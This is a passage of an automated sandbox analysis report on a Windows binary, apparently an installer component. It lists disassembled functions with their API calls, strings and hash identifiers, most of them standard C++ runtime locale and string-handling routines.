                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1383202999-2891247106
                                                                    • Opcode ID: cfa74215ee0f83e5c5225e34156a423b9c8957650ba80617cc182d6d679eb459
                                                                    • Instruction ID: af1a0b13ca94c2752e36a16c562249f0c3892806ac3f9c5066fafa79a9180750
                                                                    • Opcode Fuzzy Hash: cfa74215ee0f83e5c5225e34156a423b9c8957650ba80617cc182d6d679eb459
                                                                    • Instruction Fuzzy Hash: 36C1C7B650010AABEB18DF58CE55DFF3BF8BB08304F54425BFA42A3251D6B4DA01CB69
                                                                    Function 004266A0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 257libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00426150: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004261B5
                                                                      • Part of subcall function 00426150: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,000000FF,0046B8CD,000000FF), ref: 0042620F
                                                                      • Part of subcall function 00426150: GetLastError.KERNEL32(?,?,?,000000FF,0046B8CD,000000FF), ref: 0042626B
                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00426726
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000), ref: 00426794
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000), ref: 004267FB
                                                                    • GetLastError.KERNEL32 ref: 004269AC
                                                                    • FreeLibrary.KERNEL32(?), ref: 00426A05
                                                                    Strings
                                                                    • NtQueryInformationProcess, xrefs: 00426720
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryMemoryProcessRead$AddressDirectoryFreeLoadProcSystem
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 1101900967-2781105232
                                                                    • Opcode ID: 150b50734034c2c79ad0eceb17b727d86d8c955bf97fe06e45b045fd74dedbd9
                                                                    • Instruction ID: 3561f0fd6ec8837b845eb3c84c47d17ca7c2a0db24dfcd47308aa116d25c9d12
                                                                    • Opcode Fuzzy Hash: 150b50734034c2c79ad0eceb17b727d86d8c955bf97fe06e45b045fd74dedbd9
                                                                    • Instruction Fuzzy Hash: 93B17170D00755DBDB20CF64D9497AEBBF4EF44308F10465ED449A7280E7B96AC8CB95
                                                                    Function 0043E188 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0043E18F
                                                                    • _Maklocstr.LIBCPMT ref: 0043E1F8
                                                                    • _Maklocstr.LIBCPMT ref: 0043E20A
                                                                    • _Maklocchr.LIBCPMT ref: 0043E222
                                                                    • _Maklocchr.LIBCPMT ref: 0043E232
                                                                    • _Getvals.LIBCPMT ref: 0043E254
                                                                      • Part of subcall function 00437DCC: _Maklocchr.LIBCPMT ref: 00437DFB
                                                                      • Part of subcall function 00437DCC: _Maklocchr.LIBCPMT ref: 00437E11
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                    • String ID: false$true
                                                                    • API String ID: 3549167292-2658103896
                                                                    • Opcode ID: e03468237f7841b86465ba056d818d6fcab5f2da574143b817a4399867726c26
                                                                    • Instruction ID: aedd63e013cac718f51bdf1042580d2db0f7ece55b5e639eca2af82dfa604884
                                                                    • Opcode Fuzzy Hash: e03468237f7841b86465ba056d818d6fcab5f2da574143b817a4399867726c26
                                                                    • Instruction Fuzzy Hash: 5F2186B1D00314AADF14EFA6D845ADFBB78AF08714F00805BF9159F282EB78D554CBA5
                                                                    Function 00430780 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 274memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0043083F
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00430881
                                                                      • Part of subcall function 00430780: LocalFree.KERNEL32(?,00000000,00000000,?,?,F3E52339,F3E52339,00000000,?), ref: 00430A66
                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 004308F4
                                                                    • LocalFree.KERNEL32(?), ref: 00430931
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AllocFree$___std_exception_copy
                                                                    • String ID: ios_base::failbit set$iostream
                                                                    • API String ID: 2276494016-302468714
                                                                    • Opcode ID: ab0506274f9b927ea01e7c15639a724811e99ec55be043e951271e5733f6e4e3
                                                                    • Instruction ID: 8b09d6a16835cd7d3010c7f775fdaa69d65d4d6ff8128d05a599cab53b762cf4
                                                                    • Opcode Fuzzy Hash: ab0506274f9b927ea01e7c15639a724811e99ec55be043e951271e5733f6e4e3
                                                                    • Instruction Fuzzy Hash: CBA1D1B1D00208DFDB18DF68D894BAEBBB5EF49310F10836EE855AB381D7789944CB95
                                                                    Function 0042BD40 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000044,F3E52339,00000000,?), ref: 0042BD9B
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042BDD8
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042BE45
                                                                    • __Getctype.LIBCPMT ref: 0042BE8E
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042BF02
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042BFBF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3635123611-1405518554
                                                                    • Opcode ID: fad51948bbd20331e73f4a1f0ede8a342dcf8697b1da4014d850e4081b1088f2
                                                                    • Instruction ID: a82eacf9ac0b5fd6683239e28415a49bb1eb1883c47a56f6960c5927cddd2338
                                                                    • Opcode Fuzzy Hash: fad51948bbd20331e73f4a1f0ede8a342dcf8697b1da4014d850e4081b1088f2
                                                                    • Instruction Fuzzy Hash: 7B8191B0D04398DAEB10CFA9C94578EBBF4BF14308F14819ED544EB382E7799A44CB95
                                                                    Function 0042C4C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000018,F3E52339,00000000,?,?,?,?,?,?,?,?,00000000,0046C8F5,000000FF), ref: 0042C504
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C53E
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042C5A2
                                                                    • __Getctype.LIBCPMT ref: 0042C5EB
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042C631
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042C6E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3635123611-1405518554
                                                                    • Opcode ID: 9fe351d952268612cc4ee529971a5bc16fd1704ce4f3d85b19c85112cd37ad4c
                                                                    • Instruction ID: d37f22507405cc141cd43053f83e81b09e455128f28b3fac20abef2ac2d45fdf
                                                                    • Opcode Fuzzy Hash: 9fe351d952268612cc4ee529971a5bc16fd1704ce4f3d85b19c85112cd37ad4c
                                                                    • Instruction Fuzzy Hash: 48616EB0E01398EAEB10DFA9D5447CEBFF4AF15308F14815AE454AB381E7B99A04CB55
                                                                    Function 0044921D Relevance: 12.2, APIs: 8, Instructions: 225COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?), ref: 004492A8
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00449334
                                                                    • __alloca_probe_16.LIBCMT ref: 0044935E
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044939F
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004493BB
                                                                    • __alloca_probe_16.LIBCMT ref: 004493E1
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044941E
                                                                    • CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0044943B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                    • String ID:
                                                                    • API String ID: 3603178046-0
                                                                    • Opcode ID: 8de7f6672bd6a31d931f288e0370ab5f903ef79bfc5f46a054c764ab85a4a322
                                                                    • Instruction ID: 6ad191cf17f5a1f53389c6bd3fcd6a964ecc0202720cb9e7417e60d5db2cd9b2
                                                                    • Opcode Fuzzy Hash: 8de7f6672bd6a31d931f288e0370ab5f903ef79bfc5f46a054c764ab85a4a322
                                                                    • Instruction Fuzzy Hash: 8971F472904205ABFF208FA5CC85BEFBBB5AF0A714F14016AEC00A7291D77C8C05E768
                                                                    Function 00448CFE Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,0042C98F,?,00000001,00000000,00000000,?,?,0042C98F,?), ref: 00448D47
                                                                    • __alloca_probe_16.LIBCMT ref: 00448D73
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F,?), ref: 00448DB2
                                                                    • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F), ref: 00448DCF
                                                                    • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F), ref: 00448E0E
                                                                    • __alloca_probe_16.LIBCMT ref: 00448E2B
                                                                    • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F), ref: 00448E6D
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0042C98F,?,?,00000000,0042CFE3,0000003F,?), ref: 00448E90
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                    • String ID:
                                                                    • API String ID: 2040435927-0
                                                                    • Opcode ID: ac61388c8897050de777ffe7bea0832b8123a91d572e9f478f7e86d3faa48ab9
                                                                    • Instruction ID: 0ae64c445b169e540a3ee5b88b340c337c3ad1f95ef319a08523271f14a2ca07
                                                                    • Opcode Fuzzy Hash: ac61388c8897050de777ffe7bea0832b8123a91d572e9f478f7e86d3faa48ab9
                                                                    • Instruction Fuzzy Hash: D151B17290021AABFF209F61DC45FAF7BA9EF40B44F24442EF904E6290DB788D11CB58
                                                                    Function 004313A0 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 404registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,?,?), ref: 004317A2
                                                                    • RegQueryValueExW.ADVAPI32(?,00000002,00000000,00000000,004847B8,00000800), ref: 004317C2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValue
                                                                    • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                    • API String ID: 4153817207-1914306501
                                                                    • Opcode ID: 4e61c9fa04a3fbeaa64687debbcbdeee7c7174b003b4edc8a1d58f1ecfa1472d
                                                                    • Instruction ID: aa7c2288361252d15ce14e25e789eb4693cf93d196ff78e5fd38af828b558849
                                                                    • Opcode Fuzzy Hash: 4e61c9fa04a3fbeaa64687debbcbdeee7c7174b003b4edc8a1d58f1ecfa1472d
                                                                    • Instruction Fuzzy Hash: 7CD1D365A002528BDB34AF14C8412B772E1EFAD744F5DA46BD8458B3B1E778CC82C39D
                                                                    Function 0044D081 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0044D1A0
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0044D2AE
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0044D41B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 1206542248-393685449
                                                                    • Opcode ID: a3efbc2060127269a51c50161eb5b0996f3e4c08aa6ffefadb71f534923578ce
                                                                    • Instruction ID: d3df4639e7f2618872224a054cf9d9dc8aa3de27332e156f889df83b4b88b651
                                                                    • Opcode Fuzzy Hash: a3efbc2060127269a51c50161eb5b0996f3e4c08aa6ffefadb71f534923578ce
                                                                    • Instruction Fuzzy Hash: 4FB15871D00209EFEF15DFA5C8819AEBBB5BF04314F14456BE8016B312D739EA61CB9A
                                                                    Function 00446A44 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 277COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00446A4B
                                                                      • Part of subcall function 00445722: __EH_prolog3_GS.LIBCMT ref: 00445729
                                                                      • Part of subcall function 00445722: __Getcoll.LIBCPMT ref: 0044578D
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • __Getcoll.LIBCPMT ref: 00446A9A
                                                                      • Part of subcall function 0044556A: __EH_prolog3.LIBCMT ref: 00445571
                                                                      • Part of subcall function 0044556A: std::_Lockit::_Lockit.LIBCPMT ref: 0044557B
                                                                      • Part of subcall function 0044556A: std::_Lockit::~_Lockit.LIBCPMT ref: 004455EC
                                                                      • Part of subcall function 004349F5: __EH_prolog3.LIBCMT ref: 004349FC
                                                                      • Part of subcall function 004349F5: std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
                                                                      • Part of subcall function 004349F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
                                                                    • numpunct.LIBCPMT ref: 00446CCA
                                                                      • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localnumpunct
                                                                    • String ID: :H$:H$:H
                                                                    • API String ID: 2516209439-3960432997
                                                                    • Opcode ID: de7470cab8b8aed2534d9881d552f8f036d2cf946e244e8eb7c4c3286db8e2c7
                                                                    • Instruction ID: 540344884dc8c3bef8739b1fbe2dbae888e3ccffa0f74b4587e029ff26ffc1a4
                                                                    • Opcode Fuzzy Hash: de7470cab8b8aed2534d9881d552f8f036d2cf946e244e8eb7c4c3286db8e2c7
                                                                    • Instruction Fuzzy Hash: 03910AB1D006215BEB10AFB68C0267F7AA4DF92365F15851FF845A7282DB7C8D0087AF
                                                                    Function 0042FAC0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,0000000C,F3E52339,00000000,?,00000000,?,?,?,?,00000000,0046CFB1,000000FF,?,0042EB5A,00000000), ref: 0042FB04
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042FB3A
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042FB9E
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042FC5E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042FD12
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 2968629171-1405518554
                                                                    • Opcode ID: 84dedd6f9325feaaf40b83bf44bb76ca33279ca6ccfc9bf83aeac24240aee741
                                                                    • Instruction ID: 84de8b09e16972e76c570ee25c4e4f727722752d18573c1b24da527c4f0ed51d
                                                                    • Opcode Fuzzy Hash: 84dedd6f9325feaaf40b83bf44bb76ca33279ca6ccfc9bf83aeac24240aee741
                                                                    • Instruction Fuzzy Hash: 427191B0D01359DAEF10CFA9D9447CEBFB4BF14308F54816AE414AB381E7B99A08CB95
                                                                    Function 0042F890 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000008,F3E52339,00000000,?,00000000,?,?,?,?,0046CEBD,000000FF,?,0042EC9A,?,?), ref: 0042F8D4
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042F90A
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042F96E
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042F9DE
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042FA92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 2968629171-1405518554
                                                                    • Opcode ID: 1b39d43e2933bb4f884615cb095d8c87c10b28c52ab20704f43e05d41e87f515
                                                                    • Instruction ID: 944e2f27d68cd45d0f83f2088949cc0526b3a72e42c06823761a27a90b563718
                                                                    • Opcode Fuzzy Hash: 1b39d43e2933bb4f884615cb095d8c87c10b28c52ab20704f43e05d41e87f515
                                                                    • Instruction Fuzzy Hash: 5461B2B0E01349EAEF10CFA9D5447CEBFB4AF14308F54856ED454AB381E7B99A08CB55
                                                                    Function 0044AD30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0044AD67
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0044AD6F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0044ADF8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0044AE23
                                                                    • _ValidateLocalCookies.LIBCMT ref: 0044AE78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 058b2866f78a4e32c479e0d9dd11c875d999aa42d08022092b670177965edcfd
                                                                    • Instruction ID: 0e9671351f93cc96e0a602dfc37107c54e8f6cd2469f74bd131215dec45a29a6
                                                                    • Opcode Fuzzy Hash: 058b2866f78a4e32c479e0d9dd11c875d999aa42d08022092b670177965edcfd
                                                                    • Instruction Fuzzy Hash: 19411974E402089BDF10DF69C884A9FBBB5FF45318F24805BE8155B392D739D921CB9A
                                                                    Function 004451EC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004451F3
